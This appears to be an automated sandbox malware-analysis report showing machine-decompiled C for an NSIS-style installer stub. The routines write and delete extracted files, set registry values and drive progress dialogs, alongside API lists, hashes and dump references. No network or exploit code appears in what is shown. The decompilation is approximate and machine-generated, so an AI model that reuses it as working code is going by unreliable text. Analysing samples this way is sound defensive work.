                                                                                            • Instruction ID: 00f1469000c5a89127aeec98ef40b5380c975c6b17ce5fce2ee989e1a8c22914
                                                                                            • Opcode Fuzzy Hash: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                                                                                            • Instruction Fuzzy Hash: D9216271904745ABCB219F68DD08B5BBFF8AF01715B048A69F895E22E1C738E9048B55
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 93%
                                                                                            			E0040266E(struct _OVERLAPPED* __ebx) {
                                                                                            				void* _t27;
                                                                                            				long _t32;
                                                                                            				struct _OVERLAPPED* _t47;
                                                                                            				void* _t51;
                                                                                            				void* _t53;
                                                                                            				void* _t56;
                                                                                            				void* _t57;
                                                                                            				void* _t58;
                                                                                            
                                                                                            				_t47 = __ebx;
                                                                                            				 *(_t58 - 8) = 0xfffffd66;
                                                                                            				_t52 = E004029E8(0xfffffff0);
                                                                                            				 *(_t58 - 0x44) = _t24;
                                                                                            				if(E004055E5(_t52) == 0) {
                                                                                            					E004029E8(0xffffffed);
                                                                                            				}
                                                                                            				E0040573D(_t52);
                                                                                            				_t27 = E0040575C(_t52, 0x40000000, 2);
                                                                                            				 *(_t58 + 8) = _t27;
                                                                                            				if(_t27 != 0xffffffff) {
                                                                                            					_t32 =  *0x423eb4;
                                                                                            					 *(_t58 - 0x2c) = _t32;
                                                                                            					_t51 = GlobalAlloc(0x40, _t32);
                                                                                            					if(_t51 != _t47) {
                                                                                            						E004031DA(_t47);
                                                                                            						E004031A8(_t51,  *(_t58 - 0x2c));
                                                                                            						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x1c));
                                                                                            						 *(_t58 - 0x30) = _t56;
                                                                                            						if(_t56 != _t47) {
                                                                                            							E00402F01(_t49,  *((intOrPtr*)(_t58 - 0x20)), _t47, _t56,  *(_t58 - 0x1c));
                                                                                            							while( *_t56 != _t47) {
                                                                                            								_t49 =  *_t56;
                                                                                            								_t57 = _t56 + 8;
                                                                                            								 *(_t58 - 0x38) =  *_t56;
                                                                                            								E0040571D( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
                                                                                            								_t56 = _t57 +  *(_t58 - 0x38);
                                                                                            							}
                                                                                            							GlobalFree( *(_t58 - 0x30));
                                                                                            						}
                                                                                            						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x2c), _t58 - 8, _t47);
                                                                                            						GlobalFree(_t51);
                                                                                            						 *(_t58 - 8) = E00402F01(_t49, 0xffffffff,  *(_t58 + 8), _t47, _t47);
                                                                                            					}
                                                                                            					CloseHandle( *(_t58 + 8));
                                                                                            				}
                                                                                            				_t53 = 0xfffffff3;
                                                                                            				if( *(_t58 - 8) < _t47) {
                                                                                            					_t53 = 0xffffffef;
                                                                                            					DeleteFileA( *(_t58 - 0x44));
                                                                                            					 *((intOrPtr*)(_t58 - 4)) = 1;
                                                                                            				}
                                                                                            				_push(_t53);
                                                                                            				E00401423();
                                                                                            				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t58 - 4));
                                                                                            				return 0;
                                                                                            			}











                                                                                            0x0040266e
                                                                                            0x00402670
                                                                                            0x0040267c
                                                                                            0x0040267f
                                                                                            0x00402689
                                                                                            0x0040268d
                                                                                            0x0040268d
                                                                                            0x00402693
                                                                                            0x004026a0
                                                                                            0x004026a8
                                                                                            0x004026ab
                                                                                            0x004026b1
                                                                                            0x004026bf
                                                                                            0x004026c4
                                                                                            0x004026c8
                                                                                            0x004026cb
                                                                                            0x004026d4
                                                                                            0x004026e0
                                                                                            0x004026e4
                                                                                            0x004026e7
                                                                                            0x004026f1
                                                                                            0x00402710
                                                                                            0x004026f8
                                                                                            0x004026fd
                                                                                            0x00402705
                                                                                            0x00402708
                                                                                            0x0040270d
                                                                                            0x0040270d
                                                                                            0x00402717
                                                                                            0x00402717
                                                                                            0x00402729
                                                                                            0x00402730
                                                                                            0x00402742
                                                                                            0x00402742
                                                                                            0x00402748
                                                                                            0x00402748
                                                                                            0x00402753
                                                                                            0x00402754
                                                                                            0x00402758
                                                                                            0x0040275c
                                                                                            0x00402762
                                                                                            0x00402762
                                                                                            0x00402769
                                                                                            0x00402156
                                                                                            0x00402880
                                                                                            0x0040288c

                                                                                            APIs
                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026C2
                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026DE
                                                                                            • GlobalFree.KERNEL32 ref: 00402717
                                                                                            • WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 00402729
                                                                                            • GlobalFree.KERNEL32 ref: 00402730
                                                                                            • CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 00402748
                                                                                            • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040275C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.666527625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.666515944.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666540617.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666584246.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666656569.0000000000422000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666666204.0000000000429000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666680734.000000000042C000.00000002.00020000.sdmp Download File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                            • String ID:
                                                                                            • API String ID: 3294113728-0
                                                                                            • Opcode ID: 4c0fd2d05d9642674c9ab6b4876f57fc245776767d9f13474b3403e8ff6ab1b0
                                                                                            • Instruction ID: 9ca9f948efa3d3b3c01768b84b42719a88da944e93008125b7d5b0dd1b363230
                                                                                            • Opcode Fuzzy Hash: 4c0fd2d05d9642674c9ab6b4876f57fc245776767d9f13474b3403e8ff6ab1b0
                                                                                            • Instruction Fuzzy Hash: 5B318D71C00128BBDF216FA9CD89D9E7E79EF09364F10422AF910772E0D7795D419BA8
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 100%
                                                                                            			E00404E23(CHAR* _a4, CHAR* _a8) {
                                                                                            				struct HWND__* _v8;
                                                                                            				signed int _v12;
                                                                                            				CHAR* _v32;
                                                                                            				long _v44;
                                                                                            				int _v48;
                                                                                            				void* _v52;
                                                                                            				void* __ebx;
                                                                                            				void* __edi;
                                                                                            				void* __esi;
                                                                                            				CHAR* _t26;
                                                                                            				signed int _t27;
                                                                                            				CHAR* _t28;
                                                                                            				long _t29;
                                                                                            				signed int _t39;
                                                                                            
                                                                                            				_t26 =  *0x423684;
                                                                                            				_v8 = _t26;
                                                                                            				if(_t26 != 0) {
                                                                                            					_t27 =  *0x423f54;
                                                                                            					_v12 = _t27;
                                                                                            					_t39 = _t27 & 0x00000001;
                                                                                            					if(_t39 == 0) {
                                                                                            						E00405AA7(0, _t39, 0x41fc70, 0x41fc70, _a4);
                                                                                            					}
                                                                                            					_t26 = lstrlenA(0x41fc70);
                                                                                            					_a4 = _t26;
                                                                                            					if(_a8 == 0) {
                                                                                            						L6:
                                                                                            						if((_v12 & 0x00000004) == 0) {
                                                                                            							_t26 = SetWindowTextA( *0x423668, 0x41fc70);
                                                                                            						}
                                                                                            						if((_v12 & 0x00000002) == 0) {
                                                                                            							_v32 = 0x41fc70;
                                                                                            							_v52 = 1;
                                                                                            							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
                                                                                            							_v44 = 0;
                                                                                            							_v48 = _t29 - _t39;
                                                                                            							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
                                                                                            							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
                                                                                            						}
                                                                                            						if(_t39 != 0) {
                                                                                            							_t28 = _a4;
                                                                                            							 *((char*)(_t28 + 0x41fc70)) = 0;
                                                                                            							return _t28;
                                                                                            						}
                                                                                            					} else {
                                                                                            						_t26 =  &(_a4[lstrlenA(_a8)]);
                                                                                            						if(_t26 < 0x800) {
                                                                                            							_t26 = lstrcatA(0x41fc70, _a8);
                                                                                            							goto L6;
                                                                                            						}
                                                                                            					}
                                                                                            				}
                                                                                            				return _t26;
                                                                                            			}

















                                                                                            0x00404e29
                                                                                            0x00404e35
                                                                                            0x00404e38
                                                                                            0x00404e3e
                                                                                            0x00404e4a
                                                                                            0x00404e4d
                                                                                            0x00404e50
                                                                                            0x00404e56
                                                                                            0x00404e56
                                                                                            0x00404e5c
                                                                                            0x00404e64
                                                                                            0x00404e67
                                                                                            0x00404e84
                                                                                            0x00404e88
                                                                                            0x00404e91
                                                                                            0x00404e91
                                                                                            0x00404e9b
                                                                                            0x00404ea4
                                                                                            0x00404eb0
                                                                                            0x00404eb7
                                                                                            0x00404ebb
                                                                                            0x00404ebe
                                                                                            0x00404ed1
                                                                                            0x00404edf
                                                                                            0x00404edf
                                                                                            0x00404ee3
                                                                                            0x00404ee5
                                                                                            0x00404ee8
                                                                                            0x00000000
                                                                                            0x00404ee8
                                                                                            0x00404e69
                                                                                            0x00404e71
                                                                                            0x00404e79
                                                                                            0x00404e7f
                                                                                            0x00000000
                                                                                            0x00404e7f
                                                                                            0x00404e79
                                                                                            0x00404e67
                                                                                            0x00404ef2

                                                                                            APIs
                                                                                            • lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
                                                                                            • lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
                                                                                            • lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
                                                                                            • SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
                                                                                            • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EB7
                                                                                            • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404ED1
                                                                                            • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404EDF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.666527625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.666515944.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666540617.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666584246.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666656569.0000000000422000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666666204.0000000000429000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666680734.000000000042C000.00000002.00020000.sdmp Download File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                            • String ID:
                                                                                            • API String ID: 2531174081-0
                                                                                            • Opcode ID: 6af7de6fb12d37621311d767828a5214a6e37c73fc4d498048a22c56ae339c00
                                                                                            • Instruction ID: 451019a1d205659c79ebfdec41688bb46c1145c2f0803241f2332644a3b6c24c
                                                                                            • Opcode Fuzzy Hash: 6af7de6fb12d37621311d767828a5214a6e37c73fc4d498048a22c56ae339c00
                                                                                            • Instruction Fuzzy Hash: 12217C71A00118BBCB119FA5DD809DFBFB9FB44354F00807AF904A6290C7394E45CF98
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 100%
                                                                                            			E004046F2(struct HWND__* _a4, intOrPtr _a8) {
                                                                                            				long _v8;
                                                                                            				signed char _v12;
                                                                                            				unsigned int _v16;
                                                                                            				void* _v20;
                                                                                            				intOrPtr _v24;
                                                                                            				long _v56;
                                                                                            				void* _v60;
                                                                                            				long _t15;
                                                                                            				unsigned int _t19;
                                                                                            				signed int _t25;
                                                                                            				struct HWND__* _t28;
                                                                                            
                                                                                            				_t28 = _a4;
                                                                                            				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
                                                                                            				if(_a8 == 0) {
                                                                                            					L4:
                                                                                            					_v56 = _t15;
                                                                                            					_v60 = 4;
                                                                                            					SendMessageA(_t28, 0x110c, 0,  &_v60);
                                                                                            					return _v24;
                                                                                            				}
                                                                                            				_t19 = GetMessagePos();
                                                                                            				_v16 = _t19 >> 0x10;
                                                                                            				_v20 = _t19;
                                                                                            				ScreenToClient(_t28,  &_v20);
                                                                                            				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
                                                                                            				if((_v12 & 0x00000066) != 0) {
                                                                                            					_t15 = _v8;
                                                                                            					goto L4;
                                                                                            				}
                                                                                            				return _t25 | 0xffffffff;
                                                                                            			}














                                                                                            0x00404700
                                                                                            0x0040470d
                                                                                            0x00404713
                                                                                            0x00404751
                                                                                            0x00404751
                                                                                            0x00404760
                                                                                            0x00404767
                                                                                            0x00000000
                                                                                            0x00404769
                                                                                            0x00404715
                                                                                            0x00404724
                                                                                            0x0040472c
                                                                                            0x0040472f
                                                                                            0x00404741
                                                                                            0x00404747
                                                                                            0x0040474e
                                                                                            0x00000000
                                                                                            0x0040474e
                                                                                            0x00000000

                                                                                            APIs
                                                                                            • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040470D
                                                                                            • GetMessagePos.USER32 ref: 00404715
                                                                                            • ScreenToClient.USER32 ref: 0040472F
                                                                                            • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404741
                                                                                            • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404767
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.666527625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.666515944.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666540617.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666584246.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666656569.0000000000422000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666666204.0000000000429000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666680734.000000000042C000.00000002.00020000.sdmp Download File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: Message$Send$ClientScreen
                                                                                            • String ID: f
                                                                                            • API String ID: 41195575-1993550816
                                                                                            • Opcode ID: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                                                                                            • Instruction ID: 77fe7446b7d437ffed3a300e181f1a5f8136abba45dafe536ab26234a61f9ca7
                                                                                            • Opcode Fuzzy Hash: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                                                                                            • Instruction Fuzzy Hash: 74014071D00219BADB01DBA4DD45BFEBBB8AB55711F10012ABA10B71C0D7B4A5018B95
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 100%
                                                                                            			E00402B2D(struct HWND__* _a4, intOrPtr _a8) {
                                                                                            				char _v68;
                                                                                            				void* _t11;
                                                                                            				CHAR* _t19;
                                                                                            
                                                                                            				if(_a8 == 0x110) {
                                                                                            					SetTimer(_a4, 1, 0xfa, 0);
                                                                                            					_a8 = 0x113;
                                                                                            				}
                                                                                            				if(_a8 == 0x113) {
                                                                                            					_t11 = E00402BA9();
                                                                                            					_t19 = "unpacking data: %d%%";
                                                                                            					if( *0x423eb0 == 0) {
                                                                                            						_t19 = "verifying installer: %d%%";
                                                                                            					}
                                                                                            					wsprintfA( &_v68, _t19, _t11);
                                                                                            					SetWindowTextA(_a4,  &_v68);
                                                                                            					SetDlgItemTextA(_a4, 0x406,  &_v68);
                                                                                            				}
                                                                                            				return 0;
                                                                                            			}






                                                                                            0x00402b3a
                                                                                            0x00402b48
                                                                                            0x00402b4e
                                                                                            0x00402b4e
                                                                                            0x00402b5c
                                                                                            0x00402b5e
                                                                                            0x00402b6a
                                                                                            0x00402b6f
                                                                                            0x00402b71
                                                                                            0x00402b71
                                                                                            0x00402b7c
                                                                                            0x00402b8c
                                                                                            0x00402b9e
                                                                                            0x00402b9e
                                                                                            0x00402ba6

                                                                                            APIs
                                                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B48
                                                                                            • wsprintfA.USER32 ref: 00402B7C
                                                                                            • SetWindowTextA.USER32(?,?), ref: 00402B8C
                                                                                            • SetDlgItemTextA.USER32 ref: 00402B9E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.666527625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.666515944.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666540617.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666584246.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666656569.0000000000422000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666666204.0000000000429000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666680734.000000000042C000.00000002.00020000.sdmp Download File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                                            • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                            • API String ID: 1451636040-1158693248
                                                                                            • Opcode ID: e04cdd19e0c63b62eaa7e8eced31868a1262f8adf0a2f46f7645d1242f1aea5d
                                                                                            • Instruction ID: 63589245c82b20a35a818b51aea08eb627593e3ecb5db54badb7bc3d6c1792f2
                                                                                            • Opcode Fuzzy Hash: e04cdd19e0c63b62eaa7e8eced31868a1262f8adf0a2f46f7645d1242f1aea5d
                                                                                            • Instruction Fuzzy Hash: F3F01D70900209ABEF215F50DD0ABAA3779BB04345F00803AFA06A91D1D7B9AA569B99
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 90%
                                                                                            			E004022F5(void* __eax) {
                                                                                            				void* _t15;
                                                                                            				char* _t18;
                                                                                            				int _t19;
                                                                                            				char _t24;
                                                                                            				int _t27;
                                                                                            				intOrPtr _t35;
                                                                                            				void* _t37;
                                                                                            
                                                                                            				_t15 = E00402ADD(__eax);
                                                                                            				_t35 =  *((intOrPtr*)(_t37 - 0x14));
                                                                                            				 *(_t37 - 0x30) =  *(_t37 - 0x10);
                                                                                            				 *(_t37 - 0x44) = E004029E8(2);
                                                                                            				_t18 = E004029E8(0x11);
                                                                                            				_t31 =  *0x423f50 | 0x00000002;
                                                                                            				 *(_t37 - 4) = 1;
                                                                                            				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27,  *0x423f50 | 0x00000002, _t27, _t37 + 8, _t27);
                                                                                            				if(_t19 == 0) {
                                                                                            					if(_t35 == 1) {
                                                                                            						E004029E8(0x23);
                                                                                            						_t19 = lstrlenA(0x40a368) + 1;
                                                                                            					}
                                                                                            					if(_t35 == 4) {
                                                                                            						_t24 = E004029CB(3);
                                                                                            						 *0x40a368 = _t24;
                                                                                            						_t19 = _t35;
                                                                                            					}
                                                                                            					if(_t35 == 3) {
                                                                                            						_t19 = E00402F01(_t31,  *((intOrPtr*)(_t37 - 0x18)), _t27, 0x40a368, 0xc00);
                                                                                            					}
                                                                                            					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x44), _t27,  *(_t37 - 0x30), 0x40a368, _t19) == 0) {
                                                                                            						 *(_t37 - 4) = _t27;
                                                                                            					}
                                                                                            					_push( *(_t37 + 8));
                                                                                            					RegCloseKey();
                                                                                            				}
                                                                                            				 *0x423f28 =  *0x423f28 +  *(_t37 - 4);
                                                                                            				return 0;
                                                                                            			}










                                                                                            0x004022f6
                                                                                            0x004022fb
                                                                                            0x00402305
                                                                                            0x0040230f
                                                                                            0x00402312
                                                                                            0x00402322
                                                                                            0x0040232c
                                                                                            0x00402333
                                                                                            0x0040233b
                                                                                            0x00402349
                                                                                            0x0040234d
                                                                                            0x00402358
                                                                                            0x00402358
                                                                                            0x0040235c
                                                                                            0x00402360
                                                                                            0x00402366
                                                                                            0x0040236b
                                                                                            0x0040236b
                                                                                            0x0040236f
                                                                                            0x0040237b
                                                                                            0x0040237b
                                                                                            0x00402394
                                                                                            0x00402396
                                                                                            0x00402396
                                                                                            0x00402399
                                                                                            0x0040246f
                                                                                            0x0040246f
                                                                                            0x00402880
                                                                                            0x0040288c

                                                                                            APIs
                                                                                            • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402333
                                                                                            • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsr28EF.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402353
                                                                                            • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsr28EF.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238C
                                                                                            • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsr28EF.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040246F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.666527625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.666515944.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666540617.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666584246.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666656569.0000000000422000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666666204.0000000000429000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666680734.000000000042C000.00000002.00020000.sdmp Download File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseCreateValuelstrlen
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsr28EF.tmp
                                                                                            • API String ID: 1356686001-1380046254
                                                                                            • Opcode ID: 652f9a8a3f1dc98aeeeb98f906d59e2320e136a87a08436aae013fd7976f2720
                                                                                            • Instruction ID: c0f72d529a206c1f33eb9b8d59e365bb4fe54d10a3d93e78d78dba992e985e14
                                                                                            • Opcode Fuzzy Hash: 652f9a8a3f1dc98aeeeb98f906d59e2320e136a87a08436aae013fd7976f2720
                                                                                            • Instruction Fuzzy Hash: 0F1175B1E00118BFEB10AFA1DE4AEAF767CEB04758F10443AF505B71D0D6B99D019A69
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 100%
                                                                                            			E00402BC5(intOrPtr _a4) {
                                                                                            				char _v68;
                                                                                            				long _t6;
                                                                                            				struct HWND__* _t7;
                                                                                            				struct HWND__* _t14;
                                                                                            
                                                                                            				if(_a4 != 0) {
                                                                                            					_t14 =  *0x417044; // 0x0
                                                                                            					if(_t14 != 0) {
                                                                                            						_t14 = DestroyWindow(_t14);
                                                                                            					}
                                                                                            					 *0x417044 = 0;
                                                                                            					return _t14;
                                                                                            				}
                                                                                            				__eflags =  *0x417044; // 0x0
                                                                                            				if(__eflags != 0) {
                                                                                            					return E00405DDC(0);
                                                                                            				}
                                                                                            				_t6 = GetTickCount();
                                                                                            				__eflags = _t6 -  *0x423eac;
                                                                                            				if(_t6 >  *0x423eac) {
                                                                                            					__eflags =  *0x423ea8;
                                                                                            					if( *0x423ea8 == 0) {
                                                                                            						_t7 = CreateDialogParamA( *0x423ea0, 0x6f, 0, E00402B2D, 0);
                                                                                            						 *0x417044 = _t7;
                                                                                            						return _t7;
                                                                                            					}
                                                                                            					__eflags =  *0x423f54 & 0x00000001;
                                                                                            					if(( *0x423f54 & 0x00000001) != 0) {
                                                                                            						wsprintfA( &_v68, "... %d%%", E00402BA9());
                                                                                            						return E00404E23(0,  &_v68);
                                                                                            					}
                                                                                            				}
                                                                                            				return _t6;
                                                                                            			}







                                                                                            0x00402bd1
                                                                                            0x00402bd3
                                                                                            0x00402bda
                                                                                            0x00402bdd
                                                                                            0x00402bdd
                                                                                            0x00402be3
                                                                                            0x00000000
                                                                                            0x00402be3
                                                                                            0x00402beb
                                                                                            0x00402bf1
                                                                                            0x00000000
                                                                                            0x00402bf4
                                                                                            0x00402bfb
                                                                                            0x00402c01
                                                                                            0x00402c07
                                                                                            0x00402c09
                                                                                            0x00402c0f
                                                                                            0x00402c4d
                                                                                            0x00402c53
                                                                                            0x00000000
                                                                                            0x00402c53
                                                                                            0x00402c11
                                                                                            0x00402c18
                                                                                            0x00402c29
                                                                                            0x00000000
                                                                                            0x00402c37
                                                                                            0x00402c18
                                                                                            0x00402c5a

                                                                                            APIs
                                                                                            • DestroyWindow.USER32(00000000,00000000), ref: 00402BDD
                                                                                            • GetTickCount.KERNEL32 ref: 00402BFB
                                                                                            • CreateDialogParamA.USER32(0000006F,00000000,00402B2D,00000000), ref: 00402C4D
                                                                                              • Part of subcall function 00402BA9: MulDiv.KERNEL32(00042A75,00000064,00044855), ref: 00402BBE
                                                                                            • wsprintfA.USER32 ref: 00402C29
                                                                                              • Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
                                                                                              • Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
                                                                                              • Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
                                                                                              • Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
                                                                                              • Part of subcall function 00404E23: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EB7
                                                                                              • Part of subcall function 00404E23: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404ED1
                                                                                              • Part of subcall function 00404E23: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404EDF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.666527625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.666515944.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666540617.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666584246.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666656569.0000000000422000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666666204.0000000000429000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666680734.000000000042C000.00000002.00020000.sdmp Download File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Windowlstrlen$CountCreateDestroyDialogParamTextTicklstrcatwsprintf
                                                                                            • String ID: ... %d%%
                                                                                            • API String ID: 632923820-2449383134
                                                                                            • Opcode ID: 9ac0c74c1306bbd1fe40de56f6429fb106574e4c029b9f6bcf9b72350caeebfb
                                                                                            • Instruction ID: 259a824e759da58d6bdbd9050b41674a690fb301749dacda7e517d53f8420425
                                                                                            • Opcode Fuzzy Hash: 9ac0c74c1306bbd1fe40de56f6429fb106574e4c029b9f6bcf9b72350caeebfb
                                                                                            • Instruction Fuzzy Hash: 29019270909224EBDB216F60EF4C99F7B78AB047017104137F801B12D1C6BCA986C6EE
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 84%
                                                                                            			E00402A28(void* _a4, char* _a8, intOrPtr _a12) {
                                                                                            				void* _v8;
                                                                                            				char _v272;
                                                                                            				long _t18;
                                                                                            				intOrPtr* _t27;
                                                                                            				long _t28;
                                                                                            
                                                                                            				_t18 = RegOpenKeyExA(_a4, _a8, 0,  *0x423f50 | 0x00000008,  &_v8);
                                                                                            				if(_t18 == 0) {
                                                                                            					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
                                                                                            						if(_a12 != 0) {
                                                                                            							RegCloseKey(_v8);
                                                                                            							L8:
                                                                                            							return 1;
                                                                                            						}
                                                                                            						if(E00402A28(_v8,  &_v272, 0) != 0) {
                                                                                            							break;
                                                                                            						}
                                                                                            					}
                                                                                            					RegCloseKey(_v8);
                                                                                            					_t27 = E00405DA3(2);
                                                                                            					if(_t27 == 0) {
                                                                                            						if( *0x423f50 != 0) {
                                                                                            							goto L8;
